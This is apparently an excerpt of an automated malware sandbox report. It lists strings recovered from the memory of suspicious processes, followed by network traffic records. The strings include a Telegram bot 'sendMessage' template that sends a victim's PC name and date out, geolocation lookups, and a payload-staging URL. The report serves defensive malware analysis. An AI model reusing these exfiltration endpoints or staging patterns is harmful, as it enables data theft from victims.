          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2447599727.000000002B08F000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFFA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086255438.000000002B092000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2446942695.000000002B087000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616470680.0000000023763000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: brightness.exe, 00000004.00000002.1853607956.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.00000000206C7000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.00000000206ED000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon4
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconi
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconu
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B56000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20a
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: npratlsN.pif, 00000012.00000002.3075519147.0000000020AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: npratlsN.pif, 00000012.00000002.3075519147.0000000020AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enDzY#
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028C2E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enLz
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: npratlsN.pif, 0000000E.00000002.3083897007.0000000034281000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020934000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028AF1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034281000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020934000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.000000002095E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028BA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D40000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029ACC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CCB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035515000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035434000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003525C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003540D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353BF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035656000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.000000002190C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BC6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A70000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: npratlsN.pif, 00000008.00000003.2441941457.0000000029CA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D1B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CD3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AD2000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AA7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B1C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003539B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035237000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000354F1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003560E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353C6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035410000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.00000000218E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021CBE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A76000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028BA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D40000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029ACC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CCB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035515000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035434000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003525C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003540D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353BF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035656000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.000000002190C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BC6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A70000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: npratlsN.pif, 00000008.00000003.2441941457.0000000029CA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D1B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CD3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AD2000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AA7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B1C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003539B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035237000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000354F1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003560E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353C6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035410000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.00000000218E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021CBE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A76000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: npratlsN.pif, 00000012.00000002.3075519147.0000000020AF1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: npratlsN.pif, 00000012.00000002.3075519147.0000000020AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/DzY#
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028C5F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/Lz
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000343EF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020AE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/P
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028C5A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343F9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
